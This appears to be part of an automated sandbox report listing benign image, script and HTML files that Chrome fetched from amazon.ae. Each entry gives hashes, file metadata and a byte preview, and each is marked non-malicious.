                                                                                                                                                                                                        MD5:CF7EA177E76943BE1949322CE3923DE1
                                                                                                                                                                                                        SHA1:88752E6771BD6FCA4877CA856CD88F129902681E
                                                                                                                                                                                                        SHA-256:97FA24F6ECD9127F28EEB465BA1D9CEDC6A7674C12FD2EF785C5E422248841BA
                                                                                                                                                                                                        SHA-512:0F1F9D7CC8C4B4C2A561573001E3088B62984140C40C046E42D05F93BDD2BDC1DA0C954E957E0D8F3B6107AFB83C0FCC87D7F7805A68B904B71DE10A3598349D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/618LrXHTM3L._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".................................................................!.1A."Q.2aq...#BRrst....$6C..&45.%Sbceu....................................................!1.."2AQa..3q.....4b...............?..t._v{B.._P...b.y.|0DN..a.JG.%..Q\Xh....Ye... .......K.\.#..5q.h.V......x-t...5.O7....F......<...zt.r...o,.J.......|...H.(.F\..l..s[p].U....^.O...\+.i..~D!...).....O..69..[.Z.D..X.0.....Ts=-.E..r..Rp+.y....+q..F~.u...-^a.t..Pr....;.0b...8....a.z.....i.qqg!..i=.C..2..b.rGc.J......6...I'.Q..+..j..k..O?....4U...N...+0PDq.K....S.k.@_..kM%;Zi...+....WRoi.b..-...~..]...H.EQ.W~.Q.....ps...w[.........[8.ck+.$.......V..-m..B.TO{....3:....I97.O..Q..........o.-.f..wsX]5..r.it.........l6w.ZF..i.b..........S..5..._....Q.l..Jve...Uz.W...l\..w......A.,.*..JR.R....(.)J....t.o}.... /.dJ..F.9bhI'........#>..m.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x172, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3793
                                                                                                                                                                                                        Entropy (8bit):7.729697553549525
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:TT058vc3H9gaXM5DzWxZfNCSaTqDgvvSjQPcVIzDTOoGWBnYagFh/:TXkdgGM5AZ1C0DVIXTXYagF9
                                                                                                                                                                                                        MD5:BFBBFC1F7CBFE1900D103CDC96AA463F
                                                                                                                                                                                                        SHA1:78B2291C6B53D3E5B195184E6654FE158EEE619D
                                                                                                                                                                                                        SHA-256:8C3169B138BD1C19F789C5EE06CF4E58F27AD47C4095E10E8F454870FD99D7E7
                                                                                                                                                                                                        SHA-512:8C336DFC1AEB87F2E7F34631E3B5908E8D02F5A7291C307B36A55296E3EB759DE80EDE1D201A7067435C861DFB58F64BF8A17E3B27DD29849987D3F43BDA26D6
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."........../...............................................................9..O...]...=..>.=1i..D.........yw.h....#....uP.s~x..........9......?.....#..0KL. ..eX..>....z.../@..<u^....A......K..4..>qI2...I.......'K>H............7.}~mPy.6..K}......(K.]miCW]R[..`c..]..P.4.)+".-0..S.. ...g.g......}Q.W*..P..........|..G.]..&.,.H..1.L...(r.....-.]~Za..Y<....W......~:...x..#..*.~......L>.x.&..Io......=Q".G.2..../..9.`.!........5....B...Z>L....4#O4.K....#...k...).....Vm1....W3....".DK.,......H...z..........,.y...W{q.. .\m...k:.................nS...y...g+(k........+......................... !.."0123@4BQ.#A...............K.Y..DN#.....c...-.AZ..;,...fD.m.q..6.x.<.....b.&.W.bL.d..........g..[.....3..wf.uN.....~.....wg.Z\,...V..J..73..+c.1f...<TG..d!...c....Jm.3].v..bB.<...-.E....b..SiP[f.:k...(
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 159x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8643
                                                                                                                                                                                                        Entropy (8bit):7.954847591742441
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:lUA659Oi82/JAla6j7UI1hDmfDcxaJwuxeby:F65s1G6v1hDmLcxaSWeG
                                                                                                                                                                                                        MD5:F1F287CD7009F99CD5D29933E72FC8FF
                                                                                                                                                                                                        SHA1:88CAADD7E408D88BB515D2FCA9AB198295D17FAD
                                                                                                                                                                                                        SHA-256:BD8FDAC2A800C4F74DAF25B03C77CF113E1F6D17573139E4DD7A6F01E368840B
                                                                                                                                                                                                        SHA-512:02CB4F388330C27D1C48D9AAFDCA8D1AE1A3155A464DE3AE43CE3089CC9E4372C099F0D0E85A235A74BC32FFC17D9FD8D4821DC311F75BBE8FFA5C2C9D2F1FDF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/71s0nbDCiDL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."...............................................................!..1."AQ2aq...#TU..6Bt.........%RSbdr....Ee..&'4CDcsu.....................................................1Q!..."2Aq..a..#B............?......K.=$2.VNXV.ap...~..*...p..Q.G.....o......w.q,.-....J.M...Y....!..6..IEtb.6.vM...T.......W+a.o.5...\.....c.6".?..aY.e.."..btG3B.Aux..nG.+ *H...f1.....#.[...".{p.>..6................./.$..Q............s..SJ..}.r..g".......k.7L....m.{S....<....z.^..i..[.~......L.)*.f.VIDQ......-..B.........J.J:.!r.\..W-.'...u#p/..Dm.l.Y~yU....u..u>......y.]A...7...yr....z.}.F....]..#..O...x...uS.R~....zq;...]....U.h....,Z.~.^..o..j}.o..B1..w!.].Q.|.....\.....{....m.....=....~....yB.......T......<#.+..Hmc..<..3.Z..U.^.6......fi......y..9fj..8.t...:.)R.i ..q.a.*xI......scHT..yt..IS.Q.$.%(.HR.V...@w .*
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 350 x 450, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):14256
                                                                                                                                                                                                        Entropy (8bit):7.935047719221589
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:lxTA3vdo5DGwFf8U5JHP0gRUTKDrbymGanXyR5LdY/JBO:lxTAcGS0g6gRU+DK2nX02/JE
                                                                                                                                                                                                        MD5:64224EC939AC0B3487645C4E109030D5
                                                                                                                                                                                                        SHA1:B5AC2A7BC2AF1C9226987439F34BA8D4A79FBF0B
                                                                                                                                                                                                        SHA-256:2818F0BCCC7DDAA8E893C4655473D82589146DCC6E7AA6F78CEB9B3D4440C809
                                                                                                                                                                                                        SHA-512:9E2F8F391CA83B4DBD4170F91B30268F81D7F570E042699BD73135EA60BF3AE5AAA343F5BAE91430879DCF305914646499A6EF24C2E3CA604460585C3CCA7E31
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR...^..........QQ.....gAMA......a.....sRGB.........PLTEGpL...........................................................................................I..C..............................................................3..........................2...........-...............................................2........2..*...........3..2.....2...........1..2..........................2w.............2...w........v.......2.....-.....2............w....2.....2w........w....2..2..2.....3...$$$.....2...........2......w....2...w..222..2........2............w.......2.........333..........g.......8...........?R ...v..***...333v..v..............v..................f..e....222...................n....v.....222.f..e.......222.e.....g..d.........3......w.."/?.f....333.............r....~..1=L[..s.....mu.......Q[h...[eqdmx;GT\|......tRNS........@..........'`..<.F.Q......c.pD...+..0.#3wJ.........m.^[...7_..V.....N.....s....fA...../...{..|N....j..l..-Mv&i.9#..~..$...6i...e9...D.y0xy/...zG..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 180x200, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):13838
                                                                                                                                                                                                        Entropy (8bit):7.974316029208808
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:2SGwQAsAs6Skq1mI0KkgeECdbroJ9xFO0siCLER4zEsyjw3Xgd/7ITPpyG/zb2MS:ds7rkamIVeEKkdU/PzEsyYgdgTRxA
                                                                                                                                                                                                        MD5:6AAF5E10CFA592DF24715477CCD1A58D
                                                                                                                                                                                                        SHA1:BA746FFCB4292B10F7FE0179BBD31289259D8835
                                                                                                                                                                                                        SHA-256:A1271E50D554AACF249BF37636CE4365226DD11F938FCBD0E1CFCB2DECDFEE2A
                                                                                                                                                                                                        SHA-512:EBE4E5AAC875961119AD82323B8A25F97077D2DD84BDB5468319667F55EA5D3BCDB9A9358BBBCE2685568C5AB8C88A6914417154CCD5F0A33BC9BFA96762E6A2
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/I/91+aaxyLapL._AC_SY200_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*...........".............................................................!.1.."A.Qa.#2Bq....$3CRr..S...........%4DETst..................................................!1...AQa"q..2...#B...$4Rb...............?..---t..N.o.z,.E!..|H......J..e...C..H.........."B..jD%5.V@L...:4.J.........;..vn...:.].<"YC].......B._.V..*...X.)R.#%....ew....R=4.1..vu..-..f.bC..z2..PT0.+k]5.6..O...Dk.....<g...&....U_.?4.....=WZ...z.G&...,U6.b_...X...{.........$C.X...G/.*<i.._\23...5.(X.T.....W.......T...'...F*U.TQ#oQ.E...z{..X..x.V....,P.....iy .$..h....r......u.1.Z.z.].....q>....u...'x$.T~..$...U[w.....v}..m$.F.D$.....l..p..Z...g.r.....".pHV./..S..J.y7..y.?.g%.Lg.{<f5_..e.OsUz..52..gQ.....e...2.f!....*....F.8.a".`9U.j...Yj..........`.....L....vy-vj..`..F.......i.S.....K.........H.3.[.]1|..00-.....|.....l9.E.......f.,.s
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5427
                                                                                                                                                                                                        Entropy (8bit):7.8492577240864
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:9Fg5aG09NSc+f8nYYF76Ge55qbQHmxhQHA90EeCRAYO2iamwVH2YTLzRT+TI2/ex:9FgEEc+f8xV6Ge5MkGxqtEeCROZ1wVfb
                                                                                                                                                                                                        MD5:A84A5BCB2242983B0638541600BBFA37
                                                                                                                                                                                                        SHA1:37ACEA3B1A43937A8A980FBD824695C75FB13289
                                                                                                                                                                                                        SHA-256:7785D4012F96E2BD15FBEF1241B59574B541EC348426AEC92CF965F23ED90C3E
                                                                                                                                                                                                        SHA-512:91D2F8D8923F3C697F9DE2C4A50F6ECBFFB0F950B306A20B3CDF130FCF9D1232A836DF1C99CD69F6DD1A4FC46C1A6AE7651BE7BEEF18A65B6C8AA12487E0DB82
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/UAE-hq/2023/img/Consumer_Electronics/XCM_CUTTLE_1615422_3332324_186x116_1X_en_AE._SY116_CB597933578_.jpg
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................t...."..........9..............................................................................p......8..<...wYj..a..CAu.........bYk%...P....d.<.E..wg......m..z)]..m.k...*NY..9.#....Co5..j...$...../..;lg..p..^Q....Ju.S..U2.*....d.wM5.oh.Be...4CZ...O..Nr......?2li:W...n.....K...C...W6.e..x.....d........Q...g'..}...W..........'.#=...c......~,.1.[^.>..-.....|;m.M..K.mtSp....0...H...q.1..J.M..X.....g..9?'g>FW...............Y...............................!%5.&14Ua..$0AEeq.."'6FQTu..... @BDGdv...7Pf....................?....n....f9.)...$V....b.b......)..........p;.......:....`q.m..fy42...\8!.<..k..xi....[.r.6..c..{*."....{._/.69B.......;...f.M..................eJb..W............t........s1#..Ep.........3#...5.........4.U.C...e.H...e<]..A.u..0>...b..?.X.....'...r.?...).;.....S...:jv|%yzM.\....K.N.DXv.*.3
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 186x116, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):3939
                                                                                                                                                                                                        Entropy (8bit):7.882799296634111
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:Ttob82k6RCAxhfcVL+KExm0j/fFzWsSXisDePS6U94aHiU8T:Sbtk6RCAxhfcV+Pm0bf0s/3PwCaHiX
                                                                                                                                                                                                        MD5:B6F1D46A6B64E8B2ECFAA9B375EA7B15
                                                                                                                                                                                                        SHA1:A1F6164641E1B87998BDCC21B464BA162E83B3E3
                                                                                                                                                                                                        SHA-256:140375ED88F40F33AAC7B45F89AC6CA527489BBA011B1AA12321DC5C4018C535
                                                                                                                                                                                                        SHA-512:5711D7CF9A60DB0A381E9353D9ED5A97AD8A906343BF6F2B41B3DD2778CDF9542EB19B7C9D5B37785661EF7B609535C5FBB70B4680BC05E3D9CD078C6AB08553
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/G/39/Associates/XCM_Manual_Top_deals_DQC_a70c6d45-b37b-4159-bdbe-6ce627caa9a7._SY116_CB613590867_.jpg
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."..............................................................!1.."AQq.a...2r.B.%3Rb.......#c..................................................1.!..2AQ.q."Ba..#...............?..R..s.......Vk.P.k.g|`.+.#..V..\.Tg......`..r..f.]...nD.d!..'.yP...T...).%G.c...=.l.....L....+.....iH.....fGR...#.{....i...I.....@.R...s-...UBPulp+.....$...*.R...)J..R......*..+..:...8.1.}..[o......I..%.........K{.h..)#..tg.2./...j....q..TQ;......g.....Fv.~..|.i..,....42.!....~.A..=..Cs..T.......-..c......Yt..../.3O.gf.-v\..!. .E.<o_.......ld...yV...U?..:..-.........#,.0.$..znS.-...sHf..]P.g....^...O....QT....7>(..d..\....u..&..c..X.f......Nx-.rB..'....W9x-......{.....K.h... ....O.=....[...a....G.,.ya.F.....3.Mu....;...F.....q.Lt....@.T.H.[.[.[x5.8.5...i..6.~...1..........#.U=WwF.:T....}.DW9)$.......
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6950)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):263214
                                                                                                                                                                                                        Entropy (8bit):5.397171667330777
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:6144:5QKXCg0QR9hMRCGZsO/WUPfwxTeNlVo3Pak4kfnq81fZAfDPpwi+hYoiNWUe90ek:5QKXCg0AMRCGZsO/WUPfwxTeNlVo3PaP
                                                                                                                                                                                                        MD5:E5A6193CC94133B60030CC712A52C27E
                                                                                                                                                                                                        SHA1:E5004B2C2767EE5318E307CB3804250ED6BB1407
                                                                                                                                                                                                        SHA-256:FF100CF0B57FA46DEE19029B39F54A32E28386687055F39BA430EFB12B26B5E9
                                                                                                                                                                                                        SHA-512:4A46EC54B867CB3B8F21631A740446FA9D56D12CF7986E37483EC31BA1CFECE989E3EAA5E7CB96708B0579BC0BA06448E35907306F889CC25E6805EC4D145D9E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://images-eu.ssl-images-amazon.com/images/I/81-gwTwSXAL.js?AUIClients/FWCIMAssets
                                                                                                                                                                                                        Preview:////////////////////////////////////////////.;(function (packageFunction) {. /* istanbul ignore next */. var p = window.AmazonUIPageJS || window.P;. /* istanbul ignore next */. var attribute = p._namespace || p.attributeErrors;. /* istanbul ignore next */. var namespacedP = attribute ? attribute("FWCIMAssets", "") : p;.. /* istanbul ignore next */. if (namespacedP.guardFatal) {. namespacedP.guardFatal(packageFunction)(namespacedP, window);. } else {. namespacedP.execute(function () {. packageFunction(namespacedP, window);. });. }.}(function(P, window, undefined){.// BEGIN ASSET FWCIMAssets - 4.0./////////////////////////.// BEGIN FILE src/js/fwcim.js./////////////////////////./*...Full source (including license, if applicable) included below..*/./******/ (function(modules) { // webpackBootstrap./******/ .// The module cache./******/ .var installedModules = {};./******/./******/ .// The require function./******/ .function __webpack_require__(moduleId) {./******/.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 480x440, components 3
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):8677
                                                                                                                                                                                                        Entropy (8bit):7.717146020883101
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:08pOuWYM7w8AaRycmIQVA41bUNdR6+G7T8ymeQfvwPQ1pDIqfGz:0pLTxysQx1bU7RfQ91Qfv+O7c
                                                                                                                                                                                                        MD5:796E8C860DC13DABF58CE3E58AF179D4
                                                                                                                                                                                                        SHA1:8A4AC87DE1AC6A3D77093A5EECE8941AFF28943C
                                                                                                                                                                                                        SHA-256:A77055459F97AFC06CF08380FDE172CC195A9A9DB6F19065B3B275799D4265B7
                                                                                                                                                                                                        SHA-512:3C61770CDAAA3DE913F84CE43AAF5FBD06F8628034E1C925BF0030D119DEEBB3E0DE430D799F0A689066B7BE458AF07CA5DB8CEE0D2A9D577B499EFF5CC1C6A9
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:"https://m.media-amazon.com/images/I/31qnSUxnD0L._SR480,440_.jpg"
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*..........."..........0.............................................................,............................................................AP....................E......d...p..2.......................l.qye._....V..2O..-..@...............k['.......}R..Q...p..g..\.....wh.................~.........l..Z......(.}S...Q...5.................-.0y.........3l=.|.v.........3f..................8..s;..A.......n.9.}.V..\.&..o%................`j.Q...p.../......iZA..=....K..8.m..F..................:g.;^..q..W..f..~O.H.9....'v.....I.DIT.......................{.....T&.ek&.........`.c....d.................B!.z.P.(R..Lj..&4..zi..i.@.X-....J................>e.l.....R.)3..M;......%K.@...Hmp.evX.P..............R.G..|q...<..'-..=....b.t._o'....................:..&..v.()Z..\.b...A...._.ok:..t.3{.`..................'.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 400x400, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):65568
                                                                                                                                                                                                        Entropy (8bit):7.972734414417205
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:1536:vOVvtP7gAcRAbg1KLE/1KFA/YlRe5MaqdonYTqdGNvuyb:vMFP7SRAs1KAYl45MKnYewNvuu
                                                                                                                                                                                                        MD5:7EEDD01A919D7135E14C607DF9F34A8F
                                                                                                                                                                                                        SHA1:D0883DE70E0B06479036934BA9CE23AC870C4900
                                                                                                                                                                                                        SHA-256:CE5801AD5AC28CC87F73784BBA9E6AAE819FB432F15F5C919735453D550B9A11
                                                                                                                                                                                                        SHA-512:962605CB9BA7458BE8E0D719CB57C865BFD72548F6BB5DC98A5DACEF1F8F46E4D6E86F0101D6E949F18276075BC02D4AD805E8CC373585BC663C9986AAC08FAD
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF......................................................................................................................................................................;.................................................................................X..........F.x.n[.........y..+/.....&.[?0....m................=..,{..u.(.vE....../{.ylf...C.w.u.^_. ..........F>.3..l..c.p.ws........"[..s.4..'.H............6.vh.......:........(...N.k|..,/...........V?..w6v.P`...........6.v.s.....d...........n.sck8.Z...........)5A<zO.r.f. ......C................0..;=..4~K.sKz.=..........mp... .....,...D.#.......T.b..&e.l..C....n.J!..}f.6GK.....GS.V.....?.._.z......Z..l...w5.i..Z@.... h..C.............g%+w;A.....mk.......#x...B.;=.......,w....G...'.:.y.......-r.......GmY.P..{g........./.?.'..0....]0;....]..k>|.}.Z.........*hs...:..........N.9..N.<}.U..w........H.......4.+#.{...V.....~.w.;..v....:M.?.......$...............+wj.yEb....m.]f...7.jY..;Q<y.. ..%h...C.d.L....}+;.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:HTML document, ASCII text, with very long lines (7131)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):589842
                                                                                                                                                                                                        Entropy (8bit):5.7081618180427425
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12288:g+R9ZvUrxZpNd2r+0iRGlUPydHAXLjWtvCeVB2r+kVVleHSQYoaYbJmVrPny2BK2:VnZvUrZNd2r+0iRGlUPydHAXLjWtBkt9
                                                                                                                                                                                                        MD5:9DEE1484F90EDBC5990996EB3FEE1AFD
                                                                                                                                                                                                        SHA1:DAA9ECEFC784046738B2C08C51D959321DDEAB10
                                                                                                                                                                                                        SHA-256:276AACC6CD986D560CC6D7F9363C0C9B5B35788714D5BBEB21B807AA128FC642
                                                                                                                                                                                                        SHA-512:89CB552A43BEB3E0E15C879BA7CCEA9078B8C95575178F8BCDF478F80B8E34255E8BF173083DECB98951D11533CC17CDC0E32A8FD70C81EC228DD649051EAF79
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.amazon.ae/ref=nav_logo
                                                                                                                                                                                                        Preview:<!doctype html><html lang="en-ae" class="a-no-js" data-19ax5a9jf="dingo"> sp:feature:head-start -->.<head><script>var aPageStart = (new Date()).getTime();</script><meta charset="utf-8"/>. sp:end-feature:head-start -->. sp:feature:csm:head-open-part1 -->..<script type='text/javascript'>var ue_t0=ue_t0||+new Date();</script>. sp:end-feature:csm:head-open-part1 -->. sp:feature:cs-optimization -->.<meta http-equiv='x-dns-prefetch-control' content='on'>.<link rel="dns-prefetch" href="https://images-eu.ssl-images-amazon.com">.<link rel="dns-prefetch" href="https://m.media-amazon.com">.<link rel="dns-prefetch" href="https://completion.amazon.com">. sp:end-feature:cs-optimization -->. sp:feature:csm:head-open-part2 -->.<script type='text/javascript'>.window.ue_ihb = (window.ue_ihb || window.ueinit || 0) + 1;.if (window.ue_ihb === 1) {..var ue_csm = window,. ue_hob = +new Date();.(function(d){var e=d.ue=d.ue||{},f=Date.now||function(){return+new Date};e.d=function
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 136 x 104, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5861
                                                                                                                                                                                                        Entropy (8bit):7.941819196061047
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:s5LS1YmLYIid4UFrn782yy57rQflsr4971/SauFVE26HrKYz0L/aw8oBXMZc1gXx:UEYYYIidFR78MnQ9C4971Sx/6HGYz+/6
                                                                                                                                                                                                        MD5:661F95800A801676A279D066C3C8114E
                                                                                                                                                                                                        SHA1:C495A9B59AFD9B35A08C12513D40B8C7E7771499
                                                                                                                                                                                                        SHA-256:849C8F9A22736A09D7C0C7981842D932777B5A0056CBA7DF41997C49D536225D
                                                                                                                                                                                                        SHA-512:A42EC4D0051537ED8B7BD27150E4FEA8F688C3B5FF6FAB2EF03B64492DE8033517AE019F72855102BE5F4405E537A5600F987331B2B2D30F81F37FEB251FFB03
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://m.media-amazon.com/images/S/sash/ydDD9hnRfziI$y7.png
                                                                                                                                                                                                        Preview:.PNG........IHDR.......h.....*.......gAMA......a....:iCCPPhotoshop ICC profile..H...wTT....wz..0.)C.. .7..Da..`(..34.!...ED..A."..."."...`... ..`.QQy3.Vt.....g}k...=g.}.......tX..4.....J....c........`.23.B=.H>.n.L..."..7w.+.7....t..I...........d..P....}F....1.(1.E..........";....c.X|..v.[.=".%....qQ...-.[".L..qE.V...af.."....+I."&..B.D....).+........Rn...|nb........2...T.@`..d.0.l.[zZ......?KF\[....f...F..f_..n.M.{.H..?....}..._z=..YQmv|.....c3.....4.. ).[..W....%I .31...6.rX.......7.......(..........S.|zf.....y..q._..0....sx..p.qy..v..\.7.G...S..a..8."Q.>.j.1......>.....s@....7.|8.......,...e.%...9.-$............H.*P.*@...#`.l.=p......0..V..H.i...A>...@...v.jP..@.h.'@.8.....:..n..`....`......a!2D.. UH.2..!...y@.P....A....B..&..*...:....:.]..B..=h...~....L...2............p"......p.\.......u.6<.?.g........!....D......C..J..iA..^.&2.L#.P...EG...Q..(.j5j...U.:.jG..n.FQ3.Oh2Z.m..C..#..lt....nC_B.F...`0..F.c...Da.1k0....V.y. f.3..b...X.l ...`..{...C.q.[..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):2.9889835948335506
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:CUXPQD/lHpse:1Qvse
                                                                                                                                                                                                        MD5:E68CC604CAB69BF03B8CD228D940F5EF
                                                                                                                                                                                                        SHA1:15C0C62C4C7C917B5DD82A8E1E439211A44B9E98
                                                                                                                                                                                                        SHA-256:A3A64AEA2E96EC58A163DDB8D4CF86CF236178ED2D225B8F44154BC1B010DDCE
                                                                                                                                                                                                        SHA-512:E250128E5EBE1384113C834409BEFB9CD0728B68EF07AB3450CB0A11F64A8AE9B29C48695DB73D0E4BBA0FD976BDCC24BEEA0F326FAD1B4CA072BCCE6E24E3A5
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:GIF89a.............!.......,...........L..;
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 142x116, components 3
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):3363
                                                                                                                                                                                                        Entropy (8bit):7.875123562954156
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:TOR92BljYNzwlVqpkkfXzHATgJ0Yn3yl9k5mC:+92LScl/8PCl9k5mC
                                                                                                                                                                                                        MD5:4B9053233695A8DBAB937A203793463C
                                                                                                                                                                                                        SHA1:F05370989F36DF570BE7C0AADE4A6F941A4E3BE7
                                                                                                                                                                                                        SHA-256:C094100CC39A04E9FCF17069E0A45D0D47E4F7F0100726F2164746CDC49D34D9
                                                                                                                                                                                                        SHA-512:98683D6B29B4C438A894018C87587632C74D204B9488CFF0AD181DA9D66511628DE2081A2D7B85A4F574226117A0FDEEDCB8D06CE39C1FFC7E1D515842EE851A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:......JFIF..........................................................#......!.#.#""$'(#.'5...........!..."...)"(."$"".,"(!".#"........".$$#..$!./..."!'..$*......t...."................................................................!A.."12Qq...a....BTr...#RSU.34Ds......................................................!1R...A.."2BQqSa...#............?...B......!.!.@.F....!.!.8@a.8F..B...U.j6..It.C.d.c&pkA..Y....lE..Ws..|l.y43I....#.kZ..y....{F.(...Y.._.w......w.H..#..w#(....vj vc. ......%......FHes.&.q.....a.....o.]."....6...v....>)L.g{~.WK.\*.ME..*`|N.....p)!/#q.G...b.J........I....]/.$;u{.....t.x0....t..j...n]....|.....W...M..9.r...Dw...K.._^o...........4...G...w....1.......m.g.|...{.......GS.o.Iwc...}|...........@T}..J.z...9wd..]..=.....2(.C.pI!Lj..}.*n_.E..b.5...*.Q.}%..+Zr...d*s.'(........A..............*..ByQ.>.ioR.....%.....I..>6..i!.f\...bG....C8...S}=..:.O.G5RCZ..zY'.....4.....[.E...0-..tC.....i.G[.#.*.....-.=.+gc..H+..g.M.....At.I$q..Y#..L.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
